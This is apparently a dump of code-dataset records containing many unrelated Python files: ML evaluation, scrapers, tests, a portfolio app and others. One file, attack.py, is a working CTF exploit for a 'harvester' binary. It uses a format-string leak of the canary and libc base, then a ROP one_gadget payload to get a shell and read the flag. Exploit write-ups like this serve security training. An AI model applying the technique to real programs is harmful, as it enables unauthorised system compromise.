INTEGER,\\\n description TEXT)\")\n\n sql(\"CREATE TABLE IF NOT EXISTS files (id INTEGER PRIMARY KEY,\\\n taleName TEXT,\\\n mp3URL TEXT,\\\n coverURL TEXT)\")\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"619996362","text":"from collections import Counter\n\ndef minSteps(s: str, t: str) -> int:\n sCounter = Counter(s)\n sCounter.subtract(t)\n changes = 0\n for char in sCounter.values():\n changes += char if char > 0 else 0\n return changes\n\nif __name__ == \"__main__\":\n s = input('Enter a string: ')\n t = input('Enter another string of the same length: ')\n result = minSteps(s, t)\n print(f\"\\nThe number of changes needed to make the\\nsecond string an anagram of the first is {result}\")","sub_path":"minStepsToMakeAnagram.py","file_name":"minStepsToMakeAnagram.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99239545","text":"import sys\nimport time\nimport os\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom PIL import Image, ImageDraw\nfrom utils import *\nfrom load_data import PatchTransformer, PatchApplier, InriaDataset\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\ndef compute_IOU(bbox1_o, bbox2_o):\n '''\n\n :param bbox1_o: list: up_left_x, up_left_y, width, height\n :param bbox2_o: list: up_left_x, up_left_y, width, height\n :return:\n '''\n # bbox1 = [0., 0., 0., 0.]\n # bbox2 = [0., 0., 0., 0.]\n # bbox1[0] = bbox1_o[0]\n bbox1 = bbox1_o.copy()\n bbox2 = 
bbox2_o.copy()\n bbox1[2] = bbox1_o[2] + bbox1_o[0]\n bbox1[3] = bbox1_o[3] + bbox1_o[1]\n bbox2[2] = bbox2_o[2] + bbox2_o[0]\n bbox2[3] = bbox2_o[3] + bbox2_o[1]\n\n ixmin = max(bbox1[0], bbox2[0])\n iymin = max(bbox1[1], bbox2[1])\n ixmax = min(bbox1[2], bbox2[2])\n iymax = min(bbox1[3], bbox2[3])\n iw = max(ixmax - ixmin, 0.)\n ih = max(iymax - iymin, 0.)\n inters = iw * ih\n\n # union\n uni = ((bbox1[2] - bbox1[0]) * (bbox1[3] - bbox1[1]) +\n (bbox2[2] - bbox2[0]) * (bbox2[3] - bbox2[1]) - inters)\n\n overlap = inters / uni\n return overlap\n\n\ndef match_det(det_list, anno_list, threshold):\n\n for item in det_list:\n item['tp'] = 0\n item['fp'] = 0\n name = item['image_id']\n wait_anno_list = []\n overlap_list = []\n for item2 in anno_list:\n if item2['image_id'] == name:\n wait_anno_list.append(item2['bbox'])\n\n if len(wait_anno_list) > 0:\n anno_bbox_to_del_list = []\n for item3 in wait_anno_list:\n overlap = compute_IOU(item['bbox'], item3)\n overlap_list.append(overlap)\n anno_bbox_to_del_list.append(item3)\n ovmax = max(overlap_list)\n jmax = overlap_list.index(max(overlap_list))\n anno_bbox_to_del = anno_bbox_to_del_list[jmax]\n\n\n if ovmax > threshold:\n item['tp'] = 1\n for item4 in anno_list:\n if item4['image_id'] == name and item4['bbox'] == anno_bbox_to_del:\n # print(len(anno_list))\n anno_list.remove(item4)\n continue\n # print(len(anno_list))\n else:\n item['fp'] = 1\n else:\n item['fp'] = 1\n return det_list\n\n\ndef get_score(elem):\n return elem['score']\n\n\ndef get_first(elem):\n return elem[0]\n\n\ndef get_second(elem):\n return elem[1]\n\n\ndef pr(det_list2, anno_list2, threshold):\n import copy\n det_list = copy.deepcopy(det_list2)\n anno_list = copy.deepcopy(anno_list2)\n GTBB_num = len(anno_list)\n det_list.sort(key=get_score, reverse=True)\n det_list_tp_fp = match_det(det_list, anno_list, threshold)\n det_list_tp_fp.sort(key=get_score, reverse=True) # reverse=True : from big to small\n recall_list = []\n precision_list = []\n recall_precision_list = []\n confidence_old = 0\n\n list_show = []\n for it in det_list_tp_fp:\n list_show.append([it['image_id'], it['score'], it['tp']])\n\n for m in range(1, len(det_list_tp_fp)):\n tp = 0\n fp = 0\n tpsum = []\n\n if det_list_tp_fp[m]['tp'] == det_list_tp_fp[m]['fp']:\n print('error kkkkkkkkkkkkkkkk')\n for k in range(m):\n tp = tp + det_list_tp_fp[k]['tp']\n fp = fp + det_list_tp_fp[k]['fp']\n tpsum.append(tp)\n recall = tp/GTBB_num\n precision = tp/(tp+fp)\n\n\n if det_list_tp_fp[m]['score'] != confidence_old:\n recall_list.append(recall)\n precision_list.append(precision)\n recall_precision_list.append([recall, precision])\n else:\n # recall_list.pop()\n # precision_list.pop()\n # recall_precision_list.pop()\n recall_list.append(recall)\n precision_list.append(precision)\n recall_precision_list.append([recall, precision])\n confidence_old = det_list_tp_fp[m]['score']\n\n recall_list.append(recall)\n precision_list.append(precision)\n recall_precision_list.append([recall, precision])\n\n return recall_precision_list, recall_list, precision_list\n\n\ndef ap(recall_precision_list):\n if len(recall_precision_list) == 0:\n return float('nan')\n if len(recall_precision_list) == 1:\n repr = recall_precision_list[0]\n return repr[0] * repr[1]\n\n # use recall to sort , get_first\n recall_precision_list.sort(key=get_first, reverse=False) # reverse=True : from big to small\n\n recall_list = []\n precision_list = []\n for item in recall_precision_list:\n recall_list.append(item[0])\n precision_list.append(item[1])\n\n 
recall_nparray = np.array(recall_list)\n precision_nparray = np.array(precision_list)\n d_recall = np.diff(recall_nparray, n=1, axis=-1)\n first_d_recall = np.array(recall_list[0])\n d_recall = np.append(first_d_recall, d_recall)\n ap = np.dot(d_recall, precision_nparray)\n\n return ap\n\nif __name__ == '__main__':\n # read json\n import copy\n with open(\"clean_results.json\", 'r') as load_f:\n clean_results = json.load(load_f)\n with open(\"noise_results.json\", 'r') as load_f:\n noise_results = json.load(load_f)\n with open(\"patch_results1.json\", 'r') as load_f:\n v4_result = json.load(load_f)\n threshold = 0.5\n\n plt.plot([0, 1.05], [0, 1.05], '--', color='gray')\n\n\n\n recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(clean_results, clean_results, threshold=threshold)\n recall_nparray_patch = np.array(recall_list_patch)\n precision_nparray_patch = np.array(precision_list_patch)\n plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n\n\n recall_precision_list_noise, recall_list_noise, precision_list_noise = pr(noise_results, clean_results, threshold=threshold)\n recall_nparray_noise = np.array(recall_list_noise)\n precision_nparray_noise = np.array(precision_list_noise)\n plt.plot(recall_nparray_noise, precision_nparray_noise)\n\n\n # recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(class_shift, clean_results, threshold=threshold)\n # recall_nparray_patch = np.array(recall_list_patch)\n # precision_nparray_patch = np.array(precision_list_patch)\n # plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n\n\n # recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(up_results, clean_results, threshold=threshold)\n # recall_nparray_patch = np.array(recall_list_patch)\n # precision_nparray_patch = np.array(precision_list_patch)\n # plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n # recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(class_only, clean_results, threshold=threshold)\n # recall_nparray_patch = np.array(recall_list_patch)\n # precision_nparray_patch = np.array(precision_list_patch)\n # plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n recall_precision_list_patch, recall_list_patch, precision_list_patch = pr(v4_result, clean_results, threshold=threshold)\n recall_nparray_patch = np.array(recall_list_patch)\n precision_nparray_patch = np.array(precision_list_patch)\n plt.plot(recall_nparray_patch, precision_nparray_patch)\n\n plt.gca().set_ylabel('Precision')\n plt.gca().set_xlabel('Recall')\n plt.gca().set_xlim([0, 1.05])\n plt.gca().set_ylim([0, 1.05])\n plt.gca().legend(loc=4)\n\n\n plt.show()\n print()\n # ap = ap(recall_precision_list)\n\n\n","sub_path":"test_patch_by_zzj_after_1.py","file_name":"test_patch_by_zzj_after_1.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"468562626","text":"\"\"\"\nThis spider is a Hypotheker spider created on top of the ATSSpider\nscrapy crawl hypotheker -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://www.hypotheker.nl/over-de-hypotheker/vacatures/\"\n\nSample url:\nhttps://www.hypotheker.nl/over-de-hypotheker/vacatures/\n\"\"\"\n\nfrom hashlib import sha1\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom 
brightcorp.processors import Prefix\n\n\nclass Hypotheker(ATSSpider):\n\n    name = \"hypotheker\"\n    Job_Url = compile(r\"\\s*=\\s*'(.*)'\")\n\n    def parse(self, response):\n        sel = Selector(response)\n        jobs = sel.xpath(\n            '//table[@class=\"jobs-overview\"]/tbody/tr'\n        )\n        for job in jobs:\n            job_url = job.xpath('./@onclick').re(self.Job_Url)\n            if job_url:\n                job_url = urljoin(response.url, job_url[0])\n                meta = {\n                    'title': job.xpath('./td[1]/text()').extract(),\n                    'jobtype': job.xpath('./td[2]/text()').extract(),\n                    'loc': job.xpath('./td[3]/text()').extract(),\n                }\n                yield Request(\n                    job_url, callback=self.parse_job_callback(), meta=meta\n                )\n\n    def parse_job(self, response):\n        loader = BrightcorpItemLoader(response=response)\n\n        loader.add_xpath(\n            'description',\n            '//div[@class=\"thumb-left offset-top-small offset-bottom\"]/following-sibling::div[1]/node()[following::h2[text()=\"Meer informatie?\"]]'\n        )\n        if not loader.get_output_value('description'):\n            loader.add_xpath(\n                'description',\n                '//div[@class=\"thumb-left offset-top-small offset-bottom\"]/following-sibling::div[1]/node()[following::h2[contains(text(), \"Interesse\")]]'\n            )\n\n        loader.add_value(\n            'referencenumber', sha1(response.url).hexdigest(),\n            Prefix('%s-' % self.name)\n        )\n        loader.add_value('location', response.meta['loc'])\n        loader.add_value('jobtype', response.meta['jobtype'])\n        loader.add_value('title', response.meta['title'])\n        loader.add_value('url', response.url)\n\n        yield loader.load_item()\n\n\n\n","sub_path":"brightcorp/brightcorp/spiders/hypotheker.py","file_name":"hypotheker.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"230515036","text":"__author__ = 'Kris Sterckx'\n\n\nclass SecurityGroupRule:\n\n    def __init__(self, ip_protocol=None, port_min=None, port_max=None,\n                 direction=None, cidr=None, cloud_sg_rule=None, sg=None):\n        self.ip_protocol = ip_protocol\n        self.port_min = port_min\n        self.port_max = port_max\n        self.direction = direction\n        self.cidr = cidr\n        self.cloud_sg_rule = cloud_sg_rule\n        self.sg = sg\n","sub_path":"minicloud/model/security_group_rule.py","file_name":"security_group_rule.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"455902282","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom pandas_datareader import data as wb\r\n\r\n#Title\r\nst.title(\"Efficient Frontier\")\r\nimage = Image.open('images/compass.jpg')\r\nst.image(image,caption='Photo by AbsolutVision on Unsplash')\r\nst.markdown(\"*'Diversifying sufficiently among uncorrelated risks can reduce portfolio risk toward zero.'* - Harry Markowitz\")\r\nlist_stocks = ['MSFT', 'AMZN', 'TSLA', 'PG', 'SPOT']\r\n\r\nst.subheader(\"First approach\")\r\n#Mathematics\r\nst.markdown(\"*Formula*\")\r\nst.latex(r'''Maximize\\ R_p = \\sum_{i=1}^{n} X_i R_i\n''')\r\nst.text(\"Xi: Portfolio weight of asset i\")\r\nst.text(\"Ri: Expected return of asset i\")\r\n\r\ndef get_stock(stocks):\r\n    pf = pd.DataFrame()\r\n    for element in stocks:\r\n        pf[element] = wb.DataReader(element, data_source='yahoo', start='2018-01-01')['Adj Close']\r\n    return pf\r\n\r\nstocks = get_stock(list_stocks)\r\nst.subheader(\"Stocks table\")\r\nst.table(stocks.tail(5))\r\n\r\nst.subheader('Stocks visualization')\r\nchart_data = (stocks/stocks.iloc[0]*100)\r\nst.line_chart(chart_data)\r\n\r\n#Return calculation\r\nst.subheader(\"Calculating returns\")\r\nst.latex(r''' R_t = 
\\left(\\frac{Q_t}{Q_{t-1}}-1\\right)\n''')\n\n#Daily percentage change\ndef profit_calc(stocks):\n    return stocks.pct_change()\n\n\nprofit = profit_calc(stocks)\nprofit.dropna()\nst.text(\"Formula Stock profit\")\nst.write(profit.sum())\n\nst.subheader(\"Formula Stock Log profit\")\nst.latex(r''' r_{log} = \\frac{\\ln\\left(\\frac{V_f}{V_i}\\right)}{t}\n''')\n\ndef profit_log(stocks):\n    return np.log(stocks) - np.log(stocks.shift(1))\n\nlog_profit = profit_log(stocks)\nlog_profit.dropna()\nst.write(log_profit.sum())\nst.write(\"Mean profit:\", log_profit.sum().mean())\n\nst.subheader(\"Optimization for cryptocurrencies users portfolio\")\nst.text(\"Assign random weights\")\n# Random weights\nnum_stocks = len(list_stocks)\nrandom_array = np.random.random(num_stocks)\nweights = np.random.random(num_stocks)\nweights /= np.sum(weights) #stock1 = stock1/(stock1+stock2+stock3)\nst.write(weights)\n\n#Calculating return\ncalc_profit = np.sum(weights*log_profit.mean())*252 #trading days in a year\nst.write(\"Profit calculated given random weights\", calc_profit)\n\n#Variance calculation\nvariance = np.dot(weights.T, np.dot(log_profit.cov()*252, weights))\nst.write(\"Variance:\",variance)\nvolatility = np.sqrt(variance)\nst.write(\"Volatility:\", volatility)\n\nif st.button('Simulation'):\n    pass\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"246329763","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#########\n# utils #\n#########\n\ndef sigmoid(x):\n    return 1/(1 + np.exp(-x))\n\ndef grad_eout(w, x, y, stochastic):\n    if stochastic:\n        return sigmoid(-y*w.dot(x.T)) * (-y*x)\n    else:\n        return np.mean(sigmoid(-y*w.dot(x.T)).reshape(x.shape[0], 1) * (-y.reshape(x.shape[0], 1)*x), axis=0)\n\ndef update_w(w, x, y, eta, stochastic):\n    return w - eta * grad_eout(w, x, y, stochastic)\n\n################\n# train & test #\n################\n\ndef train(w, x, y, eta, stochastic):\n    return w - eta * grad_eout(w, x, y, stochastic)\n\ndef test(w, x):\n    return np.sign(w.dot(x.T))\n\ndef err(y, y_pred):\n    return np.mean(y != y_pred)\n\n########\n# main #\n########\n\ndef read_dat(dat_fn):\n    dat = np.genfromtxt(dat_fn)\n    x_dat = dat[:,:-1]\n    y_dat = dat[:,-1]\n    return x_dat, y_dat\n\ndef add_const(x):\n    new_x = np.ones((x.shape[0], x.shape[1] + 1))\n    new_x[:,1:] = x\n    return new_x\n\ndef main():\n    x_tra, y_tra = read_dat('./dat/hw3_train.dat')\n    x_tra = add_const(x_tra)\n    x_tes, y_tes = read_dat('./dat/hw3_test.dat')\n    x_tes = add_const(x_tes)\n\n    T = 2000\n\n    # lr = 0.001\n\n    def gd_sgd_plt(lr, plt_fn):\n        # GD\n        eouts_001_gd = []\n        w = np.zeros(x_tra.shape[1])\n        for t in range(T):\n            w = train(w, x_tra, y_tra, lr, False)\n            y_pred = test(w, x_tes)\n            eouts_001_gd += [err(y_tes, y_pred)]\n\n        # SGD\n        eouts_001_sgd = []\n        w = np.zeros(x_tra.shape[1])\n        for t in range(T):\n            choose = t % x_tra.shape[0]\n            w = train(w, x_tra[choose], y_tra[choose], lr, True)\n            y_pred = test(w, x_tes)\n            eouts_001_sgd += [err(y_tes, y_pred)]\n\n        # plot the Eout curves for GD and SGD\n        plt.rcParams['font.family'] = 'serif'\n\n        plt.plot(range(T), eouts_001_gd, 'C1', label='GD')\n        plt.plot(range(T), eouts_001_sgd, 'C2', label='SGD')\n        plt.xlabel('Iterations')\n        plt.ylabel('Eout')\n        plt.legend()\n        plt.savefig(plt_fn)\n        plt.close()\n\n    gd_sgd_plt(0.001, 'q9_001')\n    gd_sgd_plt(0.01, 'q9_01')\n\nif __name__ == \"__main__\":\n    
main()\n","sub_path":"hw3/code/q9.py","file_name":"q9.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"568484039","text":"import random\r\n\r\ndef create_random_list(n, k):\r\n L = []\r\n for i in range(n):\r\n L.append(random.randint(0, k - 1))\r\n L.sort()\r\n return L\r\n\r\ndef binarne_rek(L, left, right, y):\r\n \"\"\"Wyszukiwanie binarne w wersji rekurencyjnej.\"\"\"\r\n if left <= right:\r\n k = (left+right) // 2\r\n if y == L[k]:\r\n return k\r\n if y < L[k]:\r\n return binarne_rek(L, left, k-1, y)\r\n else:\r\n return binarne_rek(L, k+1, right, y)\r\n return None\r\n\r\ndef main():\r\n myList = create_random_list(100, 10)\r\n print(\"Lista losowych numerów:\", myList)\r\n\r\n find_number = myList[random.randint(0, len(myList) - 1)] # wybieram losowy number z listy\r\n print('Szukany numer:', find_number)\r\n\r\n print('Znaleziony indeks dowolnej szukanej liczby w liście: ', binarne_rek(myList, 0, len(myList)-1, find_number))\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Python/Zadania12/12.2.py","file_name":"12.2.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138961462","text":"import os\r\nimport sys\r\nmydir = os.environ['WORKINGDIR']\r\ntemp = os.environ['TEMP']\r\nsys.path.append(mydir+\"\\\\Vigilert\\\\Tests\\\\Stress\")\r\nfrom stress_tests import *\r\n# Comment out the set_driver_on()\r\n#set_driver_on()\r\nstdout = sys.stdout\r\nsys.stdout = open(temp+\"\\\\Vigilert\\\\stress.txt\", 'w')\r\nDURATION = 25\r\nTRIG_MAX = 10000\r\nSEED = None\r\nLOG_FLAG = TRUE\r\nDRIVER_FLAG = FALSE\r\nLOG_FILE = temp+\"\\\\Vigilert\\\\stress\"\r\nPRED_MAX = 2\r\nlong_stress(DURATION, TRIG_MAX, SEED, LOG_FLAG, DRIVER_FLAG, PRED_MAX, LOG_FILE)\r\nsys.stdout.close()\r\nsys.stdout = stdout\r\n","sub_path":"Vigilert/Tests/Stress/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482068658","text":"from __future__ import absolute_import, division, print_function\nimport unittest\n\nimport numpy as np\n\nimport astshim\nfrom astshim.test import MappingTestCase\n\n\nclass TestPermMap(MappingTestCase):\n\n def test_PermMapMatched(self):\n \"\"\"Test a PermMap whose inverse is the inverse of its forward\n \"\"\"\n permmap = astshim.PermMap([2, 3, 1], [3, 1, 2])\n self.assertEqual(permmap.getClass(), \"PermMap\")\n self.assertEqual(permmap.getNin(), 3)\n self.assertEqual(permmap.getNout(), 3)\n\n self.checkBasicSimplify(permmap)\n self.checkCopy(permmap)\n self.checkPersistence(permmap)\n\n indata = np.array([\n [1.1, 2.2, 3.3],\n [-43.5, 1309.31, 0.005],\n ])\n outdata = permmap.tran(indata)\n desoutdata = np.array([\n [3.3, 1.1, 2.2],\n [0.005, -43.5, 1309.31],\n ])\n self.assertTrue(np.allclose(outdata, desoutdata))\n\n self.checkRoundTrip(permmap, indata)\n\n def test_PermMapUnmatched(self):\n \"\"\"Test PermMap with different number of inputs and outputs\n \"\"\"\n permmap = astshim.PermMap([2, 1, 3], [3, 1])\n self.assertEqual(permmap.getClass(), \"PermMap\")\n self.assertEqual(permmap.getNin(), 3)\n self.assertEqual(permmap.getNout(), 2)\n\n self.checkPersistence(permmap)\n\n indata = np.array([1.1, 2.2, -3.3])\n indata.shape = (1, 3)\n outdata = permmap.tran(indata)\n self.assertTrue(np.allclose(outdata, [-3.3, 1.1]))\n\n indata = np.array([1.1, 
2.2])\n        indata.shape = (1, 2)\n        outdata = permmap.tranInverse(indata)\n        self.assertTrue(np.allclose(outdata, [2.2, 1.1, np.nan], equal_nan=True))\n\n    def test_PermMapWithConstants(self):\n        \"\"\"Test a PermMap with constant values\n        \"\"\"\n        permmap = astshim.PermMap([-2, 1, 3], [2, 1, -1], [75.3, -126.5])\n        self.assertEqual(permmap.getClass(), \"PermMap\")\n        self.assertEqual(permmap.getNin(), 3)\n        self.assertEqual(permmap.getNout(), 3)\n\n        indata = np.array([1.1, 2.2, 3.3])\n        indata.shape = (1, 3)\n        outdata = permmap.tran(indata)\n        self.assertTrue(np.allclose(outdata, [2.2, 1.1, 75.3]))\n\n        outdata2 = permmap.tranInverse(indata)\n        self.assertTrue(np.allclose(outdata2, [-126.5, 1.1, 3.3]))\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"tests/test_permMap.py","file_name":"test_permMap.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"102423424","text":"def write_to_file(data):\n    f = open(\"myText.txt\", \"a\")\n    f.write(data)\n    f.close()\n\ndef read_from_file(filename):\n    f = open(filename, \"r\")\n    content = f.read()\n    f.close()\n    print(content)\n\ndef main():\n    while True:\n        fil = input(\"Do you want to read or write to the file? \")\n        if fil.lower() == \"done\":\n            break\n        elif fil.lower() == \"write\":\n            write_to_file(input(\"What do you want to write to the file? \"))\n            print(\"The file is called myText.txt\")\n        elif fil.lower() == \"read\":\n            read_from_file(input(\"What is the name of the file you want to read? \"))\n        else:\n            print(\"Sorry mac, that doesn't work\")\n\nmain()\n","sub_path":"Øving 9/fil.py","file_name":"fil.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"524141338","text":"#!/usr/bin/env python2\n\nimport os\nimport platform\nimport pytest\nimport sys\nimport subprocess\n\nscript = '..' + os.sep + 'lypp.py'\ninput = 'input'\n \ndata_path = os.path.dirname(__file__)\nif data_path:\n    script = data_path + os.sep + '..' 
+ os.sep + 'lypp.py'\n    input = data_path + os.sep + 'input'\n\ndef test_script():\n    assert os.path.exists(script)\n    \ndef test_if_1():\n    global script\n    f = input + os.sep + 'ifdef_1'\n    t = subprocess.check_output([script, f]).strip()\n    e = 'mar'\n    assert(e == t)\n\ndef test_if_2():\n    global script\n    f = input + os.sep + 'ifdef_1'\n    t = subprocess.check_output([script, '-D', 'foo', f]).strip()\n    e = 'bar\\nmar'\n    assert(e == t)\n\n","sub_path":"tests/test_ifdef.py","file_name":"test_ifdef.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"312844378","text":"import logging\nimport logging.config\nimport configparser\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom mysql import connector\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.externals import joblib\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM\n\n# config\nconfig = configparser.ConfigParser()\nconfig.read('/home/sei0024/fx/conf/fx.conf')\nGRANULARITY = config['oanda']['granularity']\nMYSQL_HOST = config['mysql']['host']\nMYSQL_PORT = config['mysql']['port']\nMYSQL_USER = config['mysql']['user']\nMYSQL_PASSWORD = config['mysql']['password']\nWINDOW_SIZE = int(config['train']['window_size'])\nEPOCHS = int(config['train']['epochs'])\nBATCH_SIZE = int(config['train']['batch_size'])\nUNIT_SIZE = int(config['train']['unit_size'])\nX_SCALER_PATH = config['train']['x_scaler_path']\nY_SCALER_PATH = config['train']['y_scaler_path']\nMODEL_PATH = config['train']['model_path']\n\n# logging\nlogging.config.fileConfig('/home/sei0024/fx/conf/logging.conf')\nlogger = logging.getLogger()\n\nlogger.info('Start Train Process')\n\n# get the date range\nnow = dt.datetime.now()\nfrom_date = (now - dt.timedelta(days=365)).strftime('%Y-%m-%d 00:00:00')\nto_date = now.strftime('%Y-%m-%d 00:00:00')\n\n# fetch the data\nlogger.info('Load Datasets from {} to {}'.format(from_date, to_date))\nconn = connector.connect(\n    host=MYSQL_HOST,\n    port=MYSQL_PORT,\n    user=MYSQL_USER,\n    # password=MYSQL_PASSWORD\n)\ncur = conn.cursor(dictionary=True)\nsql = \"SELECT open,high,low,close FROM candles.usd_jpy_{granularity} \".format(\n    granularity=GRANULARITY.lower())\nsql += \"WHERE time BETWEEN '{from_date}' AND '{to_date}'\".format(\n    from_date=from_date, to_date=to_date)\ncur.execute(sql)\ntrain_candles = cur.fetchall()\ncur.close()\n\n# append the target data (next close)\ntrain_candles = pd.DataFrame(train_candles)\ntrain_corrects = train_candles.copy().close.shift(-1)\ntrain_candles = train_candles[:-1]\ntrain_corrects = pd.DataFrame(train_corrects[:-1])\n\n# normalization\nx_scaler = MinMaxScaler(feature_range=(-1, 1))\nx_scaler.fit(train_candles)\ntrain_candles_norm = x_scaler.transform(train_candles)\n\ny_scaler = MinMaxScaler(feature_range=(-1, 1))\ny_scaler.fit(train_corrects)\ntrain_corrects_norm = y_scaler.transform(train_corrects)\n\n# save the scalers\njoblib.dump(x_scaler, X_SCALER_PATH)\njoblib.dump(y_scaler, Y_SCALER_PATH)\n\n# build the dataset\ntrain_X = np.array([\n    train_candles_norm[i:i+WINDOW_SIZE, :4]\n    for i in range(len(train_candles_norm) - WINDOW_SIZE)\n])\ntrain_Y = train_corrects_norm[WINDOW_SIZE:]\n\n# training\nmodel = Sequential()\nmodel.add(LSTM(UNIT_SIZE, input_shape=(train_X.shape[1], train_X.shape[2])))\nmodel.add(Dense(1, activation='linear'))\nmodel.compile(loss='mse', optimizer='adam', metrics=['mean_absolute_error'])\nhistory = model.fit(\n    train_X, train_Y, epochs=EPOCHS, batch_size=BATCH_SIZE,\n    verbose=2, shuffle=False\n)\nloss = 
history.history['loss'][-1]\nmae = history.history['mean_absolute_error'][-1]\nlogger.info('loss: {}, mean_absolute_error: {}'.format(loss, mae))\n\n# save the model\nmodel.save(MODEL_PATH)\n\nlogger.info('Finish Train Process')\n","sub_path":"fx/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"347471084","text":"from pwn import *\n\nelf = ELF(\"./challenge/harvester\")\nlibc = ELF(\"./challenge/libc.so.6\")\n\nconn = remote(MACHINE_IP, MACHINE_PORT)\n\ndef select_menu(menu):\n    conn.recvuntil('> ')\n    conn.sendline(menu)\n\n# ANCHOR: format_exploit_fn\ndef format_exploit(progress, index):\n    progress.status(\"selecting menu fight\")\n    select_menu('1')\n\n    progress.status(\"selecting weapon format string attack\")\n    conn.recvuntil('> ')\n    conn.send(b'%%%d$p' % index)\n    conn.recvuntil(b\"Your choice is: \")\n\n    progress.status(\"computing value\")\n    value = conn.recvline()\n    value = value[:len(value) - 8]\n    value = 0 if value == b\"(nil)\" else int(value, 16)\n    return value\n# ANCHOR_END: format_exploit_fn\n\n# ANCHOR: retrieve_canary_fn\ndef retrieve_canary():\n    with log.progress(\"retrieving canary\") as progress:\n        return format_exploit(progress, 11)\n# ANCHOR_END: retrieve_canary_fn\n\n# ANCHOR: retrieve_libc_base_address_fn\ndef retrieve_libc_base_address():\n    with log.progress(\"retrieving libc base address\") as progress:\n        libc_start_main_return = 0x21bf7\n        base = format_exploit(progress, 21)\n        libc.address = base - libc_start_main_return\n# ANCHOR_END: retrieve_libc_base_address_fn\n\n# ANCHOR: drop_pie_fn\ndef drop_pie(amount):\n    with log.progress(\"dropping pies\") as progress:\n        progress.status(\"opening inventory menu\")\n        select_menu('2')\n\n        progress.status(\"choose to drop some pies\")\n        conn.recvuntil('> ')\n        conn.sendline('y')\n\n        progress.status(\"drop specified amount\")\n        conn.recvuntil('> ')\n        conn.sendline(amount)\n# ANCHOR_END: drop_pie_fn\n\n# ANCHOR: retrieve_shell_fn\ndef retrieve_shell():\n    with log.progress(\"retrieving a shell\") as progress:\n        progress.status(\"opening stare menu\")\n        select_menu('3')\n\n        progress.status(\"forging rop\")\n        rop = b\"A\" * (0x30 - 0x8)\n        rop += p64(canary)\n\n        # This value is not important\n        rop += p64(0x1234567890abcdef)\n\n        # 0x4f3d5 is the offset to open a shell with a single rop\n        # See: https://github.com/david942j/one_gadget\n        rop += p64(libc.address + 0x4f3d5)\n\n        progress.status(\"sending rop\")\n        conn.recvuntil('> ')\n        conn.send(rop)\n\n        progress.status(\"remove error message\")\n        conn.recvlines(2)\n# ANCHOR_END: retrieve_shell_fn\n\ndef retrieve_flag():\n    with log.progress(\"retrieving the flag\") as progress:\n        conn.sendline(\"cat flag.txt\")\n        log.success(conn.recvlineS())\n\n\ncanary = retrieve_canary()\nretrieve_libc_base_address()\n\ndrop_pie('-11')\nretrieve_shell()\nretrieve_flag()\n","sub_path":"src/cyber-apocalypse-2021/pwn/harvester/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"82027788","text":"from flask import Flask, render_template, request, jsonify, Response, send_from_directory, send_file\r\nfrom flask_cors import CORS\r\n\r\nimport unicodedata\r\n\r\nfrom songs import *\r\n\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\n\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n\treturn render_template('index.html')\r\n\r\n@app.route('/get_songs', 
